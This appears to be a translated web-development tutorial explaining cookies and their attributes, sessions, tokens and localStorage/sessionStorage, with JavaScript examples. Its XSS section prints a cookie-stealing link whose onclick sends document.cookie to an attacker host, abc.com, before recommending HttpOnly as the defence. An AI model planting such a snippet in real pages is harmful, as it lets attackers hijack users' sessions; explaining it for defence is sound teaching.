Understanding cookie, session, token and WebStorage

One, cookie

  1, A cookie is the identifier the server returns to the client the first time a user visits it; on every subsequent request the browser sends the cookie to the server in the request header. [Put simply: on the first visit

  the server makes a lock (the session) and hands the key that opens it (the cookie) back to the client; on every later visit the user presents the key to open the lock.]

  2, A cookie with no expiration time is a session cookie and disappears when the browser is closed. Otherwise it is a persistent cookie: it is always present until it expires, and a persistent cookie can be shared by different browsers.

  3, On the front end you can set and read the cookie with

   document.cookie = "user=heihei";

   console.log(document.cookie);

  and an expiration time can also be set. Cookies are limited in size: one can store only about 4 KB.

  4, Cookie attributes:

   A, Domain: when the server generates a cookie it can add a Domain attribute to the Set-Cookie response header to control which sites can see the cookie, for example:

  Set-Cookie: name="heihei"; domain="m.zhuanzhuan.58.com"

   If the user visits m.zhuanzhuan.58.com, the cookie name="heihei" is sent; if the user visits www.aaa.com (not under zhuanzhuan.58.com), this cookie is not sent.

   B, If a cookie is set on a sub-domain, the sub-domain can access the primary domain's cookie, whereas the primary domain cannot access the sub-domain's cookie. This is related to the Path attribute.

    For example, take the two URLs m.zhuanzhuan.58.com and m.zhuanzhuan.58.com/user/. m.zhuanzhuan.58.com sets a cookie:

   Set-cookie: id="123432";domain="m.zhuanzhuan.58.com";

    m.zhuanzhuan.58.com/user/ sets a cookie:

   Set-cookie: user="wang"; domain="m.zhuanzhuan.58.com"; path=/user/

    Accessing another path such as m.zhuanzhuan.58.com/other/ will get only

   cookie: id="123432"

    while accessing m.zhuanzhuan.58.com/user/ will get

    cookie: id="123432"
    cookie: user="wang"

   C, Secure

    With the Secure attribute, the cookie is sent to the server only over HTTPS (an encrypted connection). This is still not fully safe: because cookies are inherently insecure, sensitive information should not be transmitted in a cookie at all.

   Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT; Secure;

   5, Cookie hijacking (cross-site scripting, XSS)

    Cross-site scripting can be used to steal cookies. When a site lets JavaScript operate on cookies, an attacker's malicious code runs inside the user's session and can read the user's cookie information.

    Example:

   <a href="#" onclick="window.location = 'http://abc.com?cookie=' + document.cookie">领取红包</a>

    When the user clicks this link, the browser executes the code in onclick, and the user's cookie data for the site is sent to the attacker's server abc.com.

    The attacker can then read whatever the cookie contains.

    Solution: set the HttpOnly attribute on the cookie. With HttpOnly set, JavaScript code cannot operate on the cookie.
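To make the Domain, Path, Secure and HttpOnly rules from sections 4 and 5 concrete, here is an added example (not code from the original post): a small model of how a browser decides which stored cookies to attach to a request, and which of those document.cookie exposes to script. It reuses the post's id/user scenario and adds a constructed Secure + HttpOnly session cookie (sid); all names, values and hosts are sample data, and host-only cookies, SameSite and expiry are deliberately left out of the model.

```javascript
// Added example, not code from the original post: a model of cookie scoping
// (Domain, Path, Secure) and of what document.cookie can see (HttpOnly).
// All cookie names, values and hosts below are constructed sample data.

// Parse a "Cookie:" request header or the document.cookie string ("a=1; b=2").
function parseCookieString(str) {
  const out = {};
  for (const part of str.split(';')) {
    const idx = part.indexOf('=');
    if (idx < 0) continue;
    const name = part.slice(0, idx).trim();
    if (name) out[name] = part.slice(idx + 1).trim();
  }
  return out;
}

// Build a Set-Cookie header value; only the attributes passed are emitted.
function buildSetCookie(name, value, attrs = {}) {
  if (/[;=\s]/.test(name) || /[;\s]/.test(String(value))) {
    throw new Error('cookie name/value must not contain ";" or whitespace');
  }
  const parts = [`${name}=${value}`];
  if (attrs.domain) parts.push(`Domain=${attrs.domain}`);
  if (attrs.path) parts.push(`Path=${attrs.path}`);
  if (attrs.expires) parts.push(`Expires=${attrs.expires.toUTCString()}`);
  if (attrs.secure) parts.push('Secure');
  if (attrs.httpOnly) parts.push('HttpOnly');
  return parts.join('; ');
}

// RFC 6265 domain matching: the exact host, or a subdomain of the cookie's Domain.
function domainMatches(host, cookieDomain) {
  const d = cookieDomain.replace(/^\./, '').toLowerCase();
  const h = host.toLowerCase();
  return h === d || h.endsWith('.' + d);
}

// RFC 6265 path matching: the cookie Path must be a directory prefix of the
// request path ("/user/" matches "/user/x"; "/user" does not match "/users").
function pathMatches(reqPath, cookiePath) {
  if (reqPath === cookiePath) return true;
  if (!reqPath.startsWith(cookiePath)) return false;
  return cookiePath.endsWith('/') || reqPath[cookiePath.length] === '/';
}

// jar entries look like { name, value, domain, path, secure, httpOnly }.
function cookiesForRequest(jar, urlString) {
  const url = new URL(urlString);
  return jar.filter((c) =>
    domainMatches(url.hostname, c.domain) &&
    pathMatches(url.pathname, c.path || '/') &&
    (!c.secure || url.protocol === 'https:'));
}

// What document.cookie exposes on a page: the cookies that would be sent to
// that page's URL, minus the HttpOnly ones.
function scriptVisibleCookies(jar, pageUrl) {
  return cookiesForRequest(jar, pageUrl).filter((c) => !c.httpOnly);
}

function cookieNames(cookies) {
  return cookies.map((c) => c.name);
}

// The post's scenario as constructed data: id on the whole site, user under
// /user/ only, plus a Secure + HttpOnly session cookie.
const SAMPLE_JAR = [
  { name: 'id', value: '123432', domain: 'm.zhuanzhuan.58.com', path: '/' },
  { name: 'user', value: 'wang', domain: 'm.zhuanzhuan.58.com', path: '/user/' },
  { name: 'sid', value: 'a3fWa', domain: 'm.zhuanzhuan.58.com', path: '/', secure: true, httpOnly: true },
];

console.log(cookieNames(cookiesForRequest(SAMPLE_JAR, 'https://m.zhuanzhuan.58.com/other/')));
console.log(cookieNames(cookiesForRequest(SAMPLE_JAR, 'https://m.zhuanzhuan.58.com/user/')));
console.log(cookieNames(cookiesForRequest(SAMPLE_JAR, 'http://m.zhuanzhuan.58.com/user/')));
console.log(cookieNames(scriptVisibleCookies(SAMPLE_JAR, 'https://m.zhuanzhuan.58.com/user/')));
```

The last call is the point of section 5: even though sid is attached to every HTTPS request for the site, it never appears in document.cookie, so script injected into the page cannot read it.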


Two, session

   The session mechanism is used to record information; it is stored on the server and has no size limit.

Three, token

      1, A token is a string generated by the server that identifies the client in its requests.

      2, When the user logs in for the first time, the server generates a token and returns it to the client; afterwards the client only needs to bring this token with each request, without sending the user name and password again.

      3, A simple token is composed of: uid (the user's unique identity), time (the current timestamp), and sign (a signature: the preceding fields are compressed by a hashing algorithm into a hexadecimal string of fixed length, to prevent token leakage).

      The client sends a login request with the user name and password. The server receives the request and verifies the user name and password. After successful authentication, the server generates a token and sends it to the client.

      After receiving the token, the client stores it, either in a cookie or in Local Storage. Every request the client sends to the server afterwards must carry the token the server issued.

      The server receives the request and verifies the token carried in it; if the verification succeeds, it returns the requested data to the client.

Four, WebStorage

    WebStorage has two main goals: (1) to provide a way, other than cookies, to store session data; (2) to provide a mechanism for storing a large amount of data across sessions.

    HTML5's WebStorage provides two APIs: localStorage (local storage) and sessionStorage (session storage).

    1, Life cycle: localStorage is permanent; data in localStorage does not disappear after the page or the browser is closed.

     Unless the data is actively removed, it never disappears.

     sessionStorage is valid only for the current session: the data exists per same-origin window. As long as the browser window is not closed,

     the data survives even a page refresh, but sessionStorage is destroyed once the browser window is closed.

     Likewise, opening the same page in a separate window gets a different sessionStorage.

      2, Storage size: localStorage and sessionStorage generally hold about 5MB of data each.

      3, Storage location: localStorage and sessionStorage are both stored on the client and are not sent to the server.

      4, Stored content type: localStorage and sessionStorage store only strings; for complex objects, use the JSON.stringify and JSON.parse provided by ECMAScript.

      5, Access: localStorage: window.localStorage; sessionStorage: window.sessionStorage.

      6, Application scenarios: localStorage is commonly used for long-term login state (e.g. to determine whether the user is logged in) and suits data that should be kept locally for a long time; sessionStorage suits one-time login of sensitive accounts.
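Point 4 (strings only, so objects need JSON.stringify/JSON.parse) and point 2 (the roughly 5MB budget) are easy to get wrong in practice, so here is an added example that is not part of the original post: a small typed wrapper over a Storage object. In a browser you pass window.localStorage or window.sessionStorage; outside a browser the block falls back to a constructed in-memory object with the same getItem/setItem/removeItem API, so it also runs under Node. The helper names (memoryStorage, setJSON, getJSON) are this example's own. One caveat worth keeping in mind when a token from section three is stored this way: unlike an HttpOnly cookie, everything in WebStorage is readable by any script running on the page.

```javascript
// Added example, not code from the original post. Helper names are this
// example's own; the in-memory store is a constructed stand-in for Storage.

// Minimal stand-in with the Storage API used below. Like the real thing, it
// coerces every value to a string (which is why objects need JSON).
function memoryStorage() {
  const map = new Map();
  return {
    getItem: (k) => (map.has(k) ? map.get(k) : null),
    setItem: (k, v) => { map.set(k, String(v)); },
    removeItem: (k) => { map.delete(k); },
    clear: () => { map.clear(); },
    get length() { return map.size; },
  };
}

// window.localStorage in a browser, the stand-in anywhere else.
function pickStorage(kind = 'localStorage') {
  if (typeof window !== 'undefined' && window[kind]) return window[kind];
  return memoryStorage();
}

// Store any JSON-serialisable value. Returns false instead of throwing when the
// browser refuses the write (QuotaExceededError once the ~5MB budget is used up).
function setJSON(store, key, value) {
  try {
    store.setItem(key, JSON.stringify(value));
    return true;
  } catch (err) {
    return false;
  }
}

// Read it back; unparseable or missing entries yield the fallback rather than
// leaking the raw string (or "[object Object]") into the caller's code.
function getJSON(store, key, fallback = null) {
  const raw = store.getItem(key);
  if (raw === null) return fallback;
  try {
    return JSON.parse(raw);
  } catch (err) {
    return fallback;
  }
}

// What happens without JSON: the object is coerced to a useless string.
function naiveStoreObject(store, key, obj) {
  store.setItem(key, obj);
  return store.getItem(key);
}

const demoStore = pickStorage('localStorage');
setJSON(demoStore, 'prefs', { theme: 'dark', fontSize: 14 });
console.log(getJSON(demoStore, 'prefs'));                         // { theme: 'dark', fontSize: 14 }
console.log(naiveStoreObject(demoStore, 'raw', { theme: 'dark' })); // "[object Object]"
```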



Source: www.cnblogs.com/woniubushinide/p/11240188.html